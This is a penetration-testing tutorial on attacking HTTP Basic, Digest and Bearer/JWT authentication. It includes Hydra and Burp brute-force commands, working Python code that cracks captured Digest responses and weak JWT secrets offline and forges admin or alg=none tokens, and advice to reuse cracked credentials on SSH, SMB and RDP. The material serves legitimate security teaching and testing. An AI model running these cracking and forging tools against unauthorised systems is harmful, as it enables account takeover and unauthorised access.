Cracking HTTP Authentication:

When people think of authentication, they think of login pages. But some services put the gatekeeper at the protocol level instead: HTTP Authentication, negotiated through the WWW-Authenticate and Authorization headers. Whether it’s Basic, Digest, or Bearer, understanding how these mechanisms work helps pentesters bypass them, crack them, or abuse them.

Here’s everything you need, step-by-step.

HTTP Authentication protects resources with headers rather than web forms: the server answers with 401 and a WWW-Authenticate challenge, and the client retries with an Authorization header.

  • Basic Auth:
    • Sends username:password Base64-encoded in the Authorization header. Base64 is an encoding, not encryption; anyone holding the header has the password.
    • Trivially intercepted if not over HTTPS.
  • Digest Auth:
    • Sends an MD5 hash computed over the username, realm, password, server nonce and request URI instead of the password itself (RFC 7616 allows SHA-256, but MD5 is still what most servers use).
    • A captured challenge/response pair is still crackable offline with a wordlist, for example with John the Ripper's hdaa format.
  • Bearer Tokens / API Keys:
    • Presents a token (usually Authorization: Bearer <token>) to access resources.
    • Can be stolen and replayed; a JWT can additionally be tampered with if the server validates it badly.
Scan the target with nmap's http-auth script to see whether a resource is protected and with which scheme (point it at a specific path with --script-args http-auth.path=/admin, since the site root is often open):

nmap -p 80,443 --script http-auth <target>

This reveals:

  • Type of authentication (Basic, Digest, NTLM, etc.)
  • Realm (auth scope)
  • Whether credentials are required (the script reports the 401 and its WWW-Authenticate challenge)
Then enumerate directories; a 401 in gobuster's output marks a candidate auth-protected endpoint:

gobuster dir -u http://<target> -w /usr/share/wordlists/dirb/common.txt -k

  • Helps find hidden endpoints that may be auth-protected (look for 401 status codes in the output).
  • Visiting such an endpoint in a browser shows a credential prompt for Basic and Digest; Bearer-protected APIs just return 401 with no prompt.
  • Inspect the WWW-Authenticate response header to identify the method:
    • Basic realm="Secure Area"
    • Digest realm="API Access" (followed by nonce and qop parameters that the client must echo back)
Confirm the challenge with curl, requesting the protected path rather than the root:

curl -I http://<target>/protected

Check for:

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Basic realm="Restricted Area"

The same check in Burp:

  • Visit the endpoint
  • Intercept the response
  • Check the headers, then send the request to Intruder and brute-force the Authorization header (for Basic, a user:pass payload with the Base64-encode payload processing rule applied)

🛠 Using Hydra (Basic Auth)

hydra -L users.txt -P passwords.txt <target> http-get /protected_page

Use the https-get module for port 443.

🛠 Using Hydra (Digest Auth)

The http-get module reads the WWW-Authenticate header and switches to Digest on its own, so the command line is the same as for Basic; a trailing "digest" argument is not a module option:

hydra -L users.txt -P passwords.txt <target> http-get /protected_page

Verify a hit with curl (add --digest for a Digest realm, otherwise curl sends Basic):

curl -u admin:admin http://<target>/protected

If you see something like this in a request:

Authorization: Basic YWRtaW46YWRtaW4=

Decode it:

echo YWRtaW46YWRtaW4= | base64 -d
# admin:admin
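The three header-level operations this post walks through, identifying the scheme from WWW-Authenticate, decoding a Basic value, and cracking a captured Digest response offline (the thing Hydra does online), as one added Python example that is not part of the original post and not the code of Hydra, curl or John. Every header, nonce, password ("letmein") and wordlist entry below is constructed for the example; the client-side build_digest_header helper exists only to synthesize the capture, since there is no target to talk to.

```python
import base64
import hashlib
import re

# Added example, not code from the original post. All headers, nonces and
# passwords below are constructed; the Digest password is "letmein".


def parse_auth_header(value):
    """Split 'Scheme k="v", k2=v2' into (scheme, {k: v}).

    Works for WWW-Authenticate challenges and Digest Authorization responses.
    Quoted and unquoted values are both accepted (qop and nc are usually
    unquoted in the client's Authorization header).
    """
    scheme, _, rest = value.strip().partition(" ")
    params = {}
    for m in re.finditer(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', rest):
        params[m.group(1).lower()] = m.group(2) if m.group(2) is not None else m.group(3)
    return scheme, params


def decode_basic(value):
    """'Basic <b64>' -> (user, password). Base64 is encoding, not encryption."""
    scheme, _, b64 = value.strip().partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic header: %r" % value)
    user, _, password = base64.b64decode(b64).decode("utf-8", "replace").partition(":")
    return user, password


def _md5(s):
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(user, password, realm, method, uri, nonce, nc="", cnonce="", qop=""):
    """RFC 2617 response: MD5(HA1:nonce:nc:cnonce:qop:HA2) when qop=auth,
    or the older MD5(HA1:nonce:HA2) when the server sent no qop."""
    ha1 = _md5(f"{user}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    if qop:
        return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


def build_digest_header(user, password, challenge, method, uri, nc="00000001", cnonce="0a4f113b"):
    """What a client sends back for a challenge; used here only to synthesize the capture."""
    _, c = parse_auth_header(challenge)
    qop = "auth" if "auth" in c.get("qop", "").split(",") else ""
    resp = digest_response(user, password, c["realm"], method, uri, c["nonce"], nc, cnonce, qop)
    realm, nonce = c["realm"], c["nonce"]
    parts = [f'username="{user}"', f'realm="{realm}"', f'nonce="{nonce}"',
             f'uri="{uri}"', f'response="{resp}"']
    if qop:
        parts += [f"qop={qop}", f"nc={nc}", f'cnonce="{cnonce}"']
    return "Digest " + ", ".join(parts)


def crack_digest(method, authorization, wordlist):
    """Recompute the response for each candidate password; return the match or None.
    Everything except the password is in the captured header, so no server is needed.
    The HTTP method is part of HA2, so it must be the one from the captured request."""
    scheme, p = parse_auth_header(authorization)
    if scheme.lower() != "digest":
        raise ValueError("not a Digest header")
    for pw in wordlist:
        cand = digest_response(p["username"], pw, p["realm"], method, p["uri"],
                               p["nonce"], p.get("nc", ""), p.get("cnonce", ""), p.get("qop", ""))
        if cand == p["response"].lower():
            return pw
    return None


# Constructed capture (values are made up for this example).
CAPTURED_BASIC = "Basic YWRtaW46YWRtaW4="
CHALLENGE = ('Digest realm="API Access", qop="auth", '
             'nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", opaque="5ccc069c403ebaf9f0171e9517f40e41"')
CAPTURED_DIGEST = build_digest_header("admin", "letmein", CHALLENGE, "GET", "/api/v1/users")
WORDLIST = ["password", "admin", "123456", "letmein", "changeme"]

if __name__ == "__main__":
    print("Basic     ->", decode_basic(CAPTURED_BASIC))
    print("Challenge ->", parse_auth_header(CHALLENGE))
    print("Digest    ->", crack_digest("GET", CAPTURED_DIGEST, WORDLIST))
```

To use it on a real capture, paste the Authorization: Digest line from the proxy log or pcap into crack_digest together with the request method, and feed a real wordlist; only the nonce-bound response needs to match, so the server never sees the guesses.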

If you capture this header:

Authorization: Bearer eyJhbGciOi...

Try replaying it as-is first. If it’s a JWT (three dot-separated Base64url segments), try tampering:

  • Decode the header and payload with jwt.io or jwt_tool; they are only Base64url-encoded, not encrypted
  • Modify alg (for example to none) or the payload claims (role, sub, exp)
  • Re-sign with the secret if it is weak enough to crack from a wordlist

jwt_tool <token> -C -d <wordlist>
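The JWT tampering steps above (decode, crack a weak HS256 secret, re-sign with a modified payload, and the alg=none variant) as an added Python example; it is not part of the original post and not jwt_tool's code. The token, the server secret "secret123", the wordlist and the verify function that stands in for the server are all constructed for this example.

```python
import base64
import hashlib
import hmac
import json

# Added example, not code from the original post or from jwt_tool. The token,
# secret and wordlist below are constructed for the example.


def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _segment(obj):
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def decode_jwt(token):
    """Header and payload are only Base64url JSON; no secret is needed to read them."""
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), b64url_decode(s)


def sign_hs256(header, payload, secret):
    signing_input = f"{_segment(header)}.{_segment(payload)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def crack_hs256(token, wordlist):
    """Offline: recompute the HMAC over the token's own signing input per candidate secret."""
    signing_input, _, sig_b64 = token.rpartition(".")
    sig = b64url_decode(sig_b64)
    for secret in wordlist:
        cand = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
        if hmac.compare_digest(cand, sig):
            return secret
    return None


def forge_with_secret(token, secret, **claims):
    """Once the secret is known, change claims and re-sign; the server cannot tell."""
    header, payload, _ = decode_jwt(token)
    payload.update(claims)
    return sign_hs256(header, payload, secret)


def alg_none_token(token):
    """The classic alg=none tamper: same claims, empty signature, trailing dot kept."""
    _, payload, _ = decode_jwt(token)
    none_header = _segment({"alg": "none", "typ": "JWT"})
    return f"{none_header}.{_segment(payload)}."


def verify(token, secret, allowed_algs=("HS256",)):
    """How a correctly written server checks the token: pin the algorithm to an
    allow-list (so alg=none is rejected), then compare a freshly computed HMAC."""
    header, _, sig = decode_jwt(token)
    if header.get("alg") not in allowed_algs:
        return False
    signing_input, _, _ = token.rpartition(".")
    expected = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, sig)


# Constructed: a token the "server" issued with a weak secret.
SERVER_SECRET = b"secret123"
CAPTURED = sign_hs256({"alg": "HS256", "typ": "JWT"},
                      {"sub": "alice", "role": "user"}, SERVER_SECRET)
WORDLIST = [b"password", b"jwtsecret", b"secret123", b"changeme"]

if __name__ == "__main__":
    print("claims           :", decode_jwt(CAPTURED)[1])
    secret = crack_hs256(CAPTURED, WORDLIST)
    print("cracked secret   :", secret)
    forged = forge_with_secret(CAPTURED, secret, role="admin")
    print("forged accepted  :", verify(forged, SERVER_SECRET))
    print("alg=none accepted:", verify(alg_none_token(CAPTURED), SERVER_SECRET))
```

The forged token passes verification because the signature is genuine once the secret is cracked; the alg=none token only works against servers that let the token pick its own algorithm, which is why verify pins the allow-list instead of reading alg from the header.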

Once you’re authenticated…

  • Access hidden endpoints
  • Download backups or configuration files
  • Use Bearer tokens against endpoints they were never issued for
  • Bypass role restrictions if the server trusts the token's claims without validating its signature or scope
  • Try the credentials on:
    • SSH
    • SMB
    • RDP
    • Web login forms
  • If you can MITM traffic or read proxy logs, Basic credentials come out in plaintext after a single Base64 decode

HTTP Auth may seem like a roadblock, but it’s often just a speed bump. Whether you’re decoding Base64 Basic credentials, brute-forcing your way in, or replaying bearer tokens, knowing how these headers work gives you a real edge.
